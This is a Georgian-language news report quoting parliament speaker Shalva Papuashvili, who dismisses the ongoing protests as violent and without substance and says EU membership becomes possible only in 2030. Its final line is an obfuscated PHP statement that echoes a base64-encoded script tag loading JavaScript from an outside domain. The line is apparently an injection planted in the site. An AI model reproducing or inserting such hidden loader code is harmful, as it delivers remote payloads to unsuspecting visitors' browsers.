celsiusi
ავერსი შნაიდერი
მიმდინარე პროტესტს არ აქვს არავითარი შინაარსი, ამიტომაც არ მოგვისმენია გამოსვლები, ამიტომაც გაექცნენ დებატებს, ამიტომაც ამჯობინეს ხმაური საუბარს. ევროკავშირის წევრობის შესაძლებლობა მხოლოდ 2030 წელს გაჩნდება. ჩვენ გეგმა სწორედ ამ თარიღზეა მიმართული. გაგვიხსნიან, მივიღებთ, ხელს მოვაწერთ და შევასრულებთ, - ამის შესახებ პარლამენტის თავმჯდომარემ, შალვა პაპუაშვილმა საკანონმდებლო ორგანოში გამართულ ბრიფინგზე განაცხადა.
მისივე თქმით, ნაცვლად გაფიცვებისკენ მოწოდებისა თუ პეტიციების შედგენისა, გარდა სისტემის თვითლუსტრაციისა, მოქალაქეების ამ ჯგუფებმა სჯობს რჩეულ პარტიებს მოსთხოვონ პასუხისმგებლობის აღება ქვეყნის ხვალინდელ დღეზე.
„ბოლო დღეების მოვლენების ფონზე, ძალადობრივი პროტესტის ხმაურში ჩაიკარგა ჩვენი ხალხის მთავარი გზავნილი, რომელსაც მოსახლეობამ ხმა მისცა არჩევნებზე - საქართველო ევროკავშირის წევრი უნდა გახდეს ღირსეულად, მშვიდობიანად და კეთილდღეობით. სწორედ ეს გზავნილი განასხვავებს ჩვენს საგარეო პოლიტიკას ოპოზიციის უშინაარსო, ყალბად ემოციური და ხმაურიანი კამპანიისგან. ბოლო ერთი კვირის განმავლობაში ჩვენს ხალხს არ მოუსმენია არც ერთი შინაარსიანი გზავნილი, არც ერთი აზრიანი მოწოდება, არც ერთი გონიერი წინადადება იმაზე, თუ როგორ შეიძლება დავეხმაროთ ჩვენს ქვეყანას, გახდეს ევროპის ნაწილი ისე, რომ არ დაზიანდეს ჩვენი ეროვნული ინტერესები, ჩვენი მოსახლეობის უსაფრთხოება და ეკონომიკური კეთილდღეობა. ძალადობის ხმაურში ასევე ჩაიკარგა ევროპის პასუხი ჩვენს მოვლენებზე. როდესაც ოპოზიციის რუპორი ტელევიზიები დაჟინებით აშუქებდნენ ზოგიერთი მიკერძოებული ევროპელი პოლიტიკოსის პათეტიკურ მოწოდებებს, ევროპის ყველაზე ავტორიტეტული ინსტიტუტებისგან მომდინარე გზავნილები სრულიად განსხვავებული აღმოჩნდა. ვხედავთ, რომ არსებობს საკუთარ მერკანტილურ ინტერესებზე მოწყობილი, ევროპას შეფარებული ძალები და არსებობს ის ინსტიტუტები, რომლებიც არ ექვემდებარებიან კონიუნქტურას, ლაპარაკობენ სიმართლეს, იცავენ ჭეშმარიტების ფასეულობას. ჩვენ კი ვდგავართ არჩევანის წინაშე, რისკენ უნდა მივისწრაფოდეთ? ევროპარლამენტის ზოგიერთი ოდიოზური დეპუტატის მიერ შედგენილი სიცრუით გაჟღენთილი რეზოლუციებისკენ, რომლითაც ხან სააკაშვილის გათავისუფლებას ითხოვენ და ხან კეზერაშვილის გამართლებას, თუ ისეთი ინსტიტუციების გადაწყვეტილებებისაკენ, როგორიცაა ეუთო/ოდირის საარჩევნო დასკვნა ან სტრასბურგის ადამიანის უფლებათა ევროპული სასამართლოს ვერდიქტი, ამჯერად კეზერაშვილის გასამტყუნებლად. სურათი ნათელია. ჩვენ ვირჩევთ სტრასბურგის სასამართლოს, რომელიც ვინ მოსთვლის უკვე მერამდენედ ამოწმებს ქართული მართლმსაჯულების გადაწყვეტილებებს. ჩვენ ვირჩევთ შეფასებებს, რომლებიც მიუკერძოებლად კეთდება ეუთოს მისიის მხრიდან საპარლამენტო არჩევნების შესახებ. ჩვენი ოპონენტები კი გმობენ ყველაფერს, სიმართლეს სიცრუედ გვასაღებენ, ნებისმიერ განზრახვას კი, რაც ქვეყანას ძირს გამოუთხრის, ვნებით უჭერენ მხარს.
ჩვენ მოხარული ვართ ქართველი ამომრჩევლის, რომლებმაც დაინახეს ჩვენი არჩევანი, გვენდნენ და მხარი დაგვიჭირეს. ამ ნდობას ჩვენ არ გავაცრუებთ. ჩვენ დღევანდელ დღემდე და მომავალშიც შევეცდებით დავანახოთ ოპოზიციურ ამომრჩეველს ჩვენი სიმართლე, რათა მათ შეძლონ და შეადარონ იმ უმსგავსო და უპასუხისმგებლო საქციელს, რასაც სჩადის მათ მიერ არჩეული პარტიები. მოსახლეობის უმრავლესობამ აირჩია მშვიდობა, სტაბილურობა, ევროპული მომავალი და ქვეყნის გამთლიანება. სამწუხაროდ, რევანშისტული და რადიკალური ძალები არათუ ქვეყნის და სახელმწიფოს, თავიანთი ამომრჩევლის ნდობასაც აცრუებენ.
მიმდინარე დღეებში ჩვენ ვხედავთ სწორედ ასეთ სასოწარკვეთილ მცდელობას, იქნებ ამ უკანასკნელ ჯერზე მაინც შეძლონ და ამოატრიალონ ქვეყანა. ეს არც გამოვიდა და ვერც გამოვა. ვფიქრობთ, რომ საკმარისი დრო გავიდა და საკმარისი მოვლენები დატრიალდა იმისთვის, რომ ემოციები ჩაცხრეს, ცხოვრება დაუბრუნდეს ჩვეულ კალაპოტს, ისევე როგორც კონსტიტუციურ ჩარჩოში უნდა დაბრუნდნენ პოლიტიკური პარტიებიც და მათი მხარდამჭერებიც.
მიმდინარე პროტესტს არ აქვს არავითარი შინაარსი. ამიტომაც, არ მოგვისმენია გამოსვლები, ამიტომაც გაექცნენ დებატებს, ამიტომაც ამჯობინეს ხმაური საუბარს. აპროტესტებენ იმას, რაც ბუნებაში არ არსებობს. ვერავინ ახერხებს თქვას და დაასახელოს კონკრეტული და ხელშესახები ფაქტორი, რომელსაც ევროკავშირი გვთავაზობს, ხოლო ხელისუფლება უარს ამბობს. ყველამ ვიცით, რომ ევროკავშირის წევრობის შესაძლებლობა მხოლოდ 2030 წელს გაჩნდება. ჩვენ გეგმა სწორედ ამ თარიღზეა მიმართული. მოლაპარაკებების გახსნა ევროპული სტრუქტურების ხელშია. საქართველო ყველაზე მეტად იმსახურებს და ყველაზე მეტად მზადაა პროცესის დასაწყებად. გაგვიხსნიან, მივიღებთ, ხელს მოვაწერთ და შევასრულებთ.
თუმცა ბოლო პერიოდში კარგად გამოჩნდა ის, რაც მანამდეც ნათელი იყო, რომ ჩვენ ჩვენს ევროპულ გზაზე ხელოვნური ბარიერები გვექმნება. სწორედ ამის დამადასტურებელია საქართველოში ჩატარებული საპარლამენტო არჩევნების შედეგებით იმედგაცრუებული ზოგიერთი უცხოელი სუბიექტების მცდელობა არ მიიღონ ქართველი ხალხის არჩევანი. მიუხედავად არჩევნებამდე მკაფიოდ ნათქვამისა, რომ არჩევნების შეფასებისას ყველა იხელმძღვანელებდა ეუთო/ოდირის დასკვნით, ვხედავთ, თუ როგორ ხდება არათუ ამ დასკვნის წაყრუება, არამედ ეუთო/ოდირის მისიაზე თავდასხმაც კი. ეს, რა თქმა უნდა, ამყარებს ეჭვს, რომ ზოგიერთი სუბიექტი თავიდანვე ერთი გეგმით მოქმედებდა: ან ხელისუფლებაში ბრუნდება კოლექტიური „ნაციონალური მოძრაობის“ რეჟიმი, ან ხდება არჩევნების ჩაშლა და ქართველი ხალხისთვის არჩევანის წართმევა. ამის ნიშნებს ჩვენ ჯერ კიდევ წინასაარჩევნო კამპანიისას ვხედავდით, რომელიც არნახული საგარეო ჩარევის ფონზე მიმდინარეობდა.
თუმცა არც ამ გეგმას უწერია აღსრულება. საქართველოში არჩევნები შედგა, ყველა პარტიამ მიიღო ხმების ის რაოდენობა, რაც მიიღო, საქართველო ევროპული ოჯახის წევრია და ის იმსახურებს პატივისცემით, ღირსეულად და თანასწორად მოპყრობას. ჩვენ, როგორც ჭეშმარიტად ძირძველი ევროპული კულტურის მქონე ქვეყანა, გავაგრძელებთ იმგვარ ცივილურ ქმედებას, როგორც შეგვეფერება. ჩვენ ვმუშაობთ ქვეყნის განვითარებაზე, წინსვლაზე და არა ვინმესთვის თავის მოწონებაზე.
მიუხედავად არაერთგზის ბრალდებისა, რომ ქართული პოლიცია ვინმეს არბევს თუ სდევნის, ყველაფერი, თითოეული წამი, რამდენიმე ტელევიზიის მიერ გადაიცემა პირდაპირ ეთერში და ყველა ნათლად ხედავს, რომ მშვიდობიანი პროტესტის გამოხატვა არის სრულიად თავისუფალი და შეუზღუდავი. პოლიცია მოქმედებას იწყებს მხოლოდ მაშინ, როდესაც, წაქეზებით თუ ორგანიზებით, აგრესიული ჯგუფები იწყებენ პოლიციელებზე თავდასხმას და ძალადობას. ბუნებრივია, რომ ქვეყნის კონსტიტუციური წყობილების წინააღმდეგ დაუფარავად მიმართული ეს ქმედებები მკაცრადაა აღკვეთილი და ეს ასეც გაგრძელდება.
საზოგადოება რამდენიმე ტელევიზიის პირდაპირ ეთერში ადევნებდა თვალყურს აქციების მიმდინარეობას და თავად ხედავდა, თუ რა თანმიმდევრობით ვითარდებოდა მოვლენები. ხედავდა, რომ აქციის დაწყებიდან მალევე იწყებოდა პოლიციელებზე თავდასხმა, ქვების და პიროტექნიკის სროლა, პარლამენტის შენობის დაზიანება. პოლიცია მრავალჯერადად აფრთხილებდა აქციის ორგანიზატორებს და მონაწილეებს, რომ პროტესტი მშვიდობიანი ფორმით გამოეხატათ, თუმცა ვხედავდით, რომ არც ორგანიზატორები და არც აქციის სხვა მონაწილეები, არაფერს აკეთებდნენ იმისთვის, რომ ეს ძალადობა აღეკვეთათ. პირიქით, ქვების, „მოლოტოვის კოქტეილების“, პიროტექნიკის ადამიანებისთვის სროლა, ოპოზიციის კუთვნილმა მედიებმა, სანახაობადაც კი აქციეს, პროტესტის დანარჩენი მონაწილეები კი პირიქით ამხნევებდნენ მოძალადეებს.
ის, რომ ეს რამდენიმედღიანი ძალადობა რადიკალური პარტიების მიერ იყო წინასწარ ორგანიზებული ადვილად დადასტურდა ორი დღის წინ ჩატარებული საპოლიციო ღონისძიებით, როდესაც მთელმა საზოგადოებამ იხილა, თუ რა რაოდენობის პიროტექნიკა და ძალადობრივი თავდასხმისთვის განკუთვნილი სხვა საშუალებები იქნა ამოღებული პარტიების ოფისებიდან”, - განაცხადა შალვა პაპუაშვილმა.
მისივე თქმით, საზოგადოებამ ნახა, რომ როგორც კი მოხდა ამ მასალების ამოღება და ძალადობის ორგანიზატორების დაკავება, პროტესტი იმავე დღეს იქცა მშვიდობიანად.
„ამ დღეებმა გვაჩვენა, რომ მიუხედავად პარტიული ორგანიზებისა და კარგად მომზადებული აქტივისტების მიერ აგრესიული ჯგუფების წახალისებისა, დემონსტრაციის ეს ტალღა ვერ აღწევს დასახულ მიზანს, მოაწყოს ქვეყანაში გადატრიალება, რევოლუცია, ქვეყნის ჩამოშლა და საბოტაჟი. სწორედ ამიტომ, მაგიდაზე დევს ერთადერთი გონივრული ალტერნატივა. ყველა უნდა დაუბრუნდეს სახელმწიფოებრივ და საკონსტიტუციო ველს, უარი თქვან უაზრო შეტაკებასა და აგრესიაზე, რომელიც აზიანებს მოქალაქეებს და განაგრძონ კანონის დაცვით პარტიული საქმიანობა. ნაცვლად გაფიცვებისკენ მოწოდებისა თუ პეტიციების შედგენისა, რომელიც ვერავითარ შედეგს ვერ გამოიღებს, გარდა სისტემის თვითლუსტრაციისა, მოქალაქეების ამ ჯგუფებმა სჯობს გაამჟღავნონ ვის დაუჭირეს მხარი არჩევნებზე და მათ რჩეულ პარტიებს მოსთხოვონ პასუხისმგებლობის აღება ქვეყნის ხვალინდელ დღეზე.
თქვენ ყველანი ადევნებთ თვალს მსოფლიოში შექმნილ ვითარებას, იმ ესკალაციას და დაძაბულობას, რაც ბოლო პერიოდში არაერთი მიმართულებით შეინიშნება. ჩვენ სიმშვიდით და სიმტკიცით გადავიტანთ ამ რთულ პერიოდს, ვიდრე არ გავალთ სამშვიდობოს. მანამდე კი როგორც მოგეხსენებათ, წლის ბოლომდე პარლამენტს აკისრია რამდენიმე მნიშვნელოვანი ვალდებულების შესრულება, დასამტკიცებელია ბიუჯეტი, ასარჩევია ახალი პრეზიდენტი, ამ გეგმას ჩვენ მეთოდურად და თანმიმდევრულად განვახორციელებთ”, - განაცხადა პაპუაშვილმა.
61
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");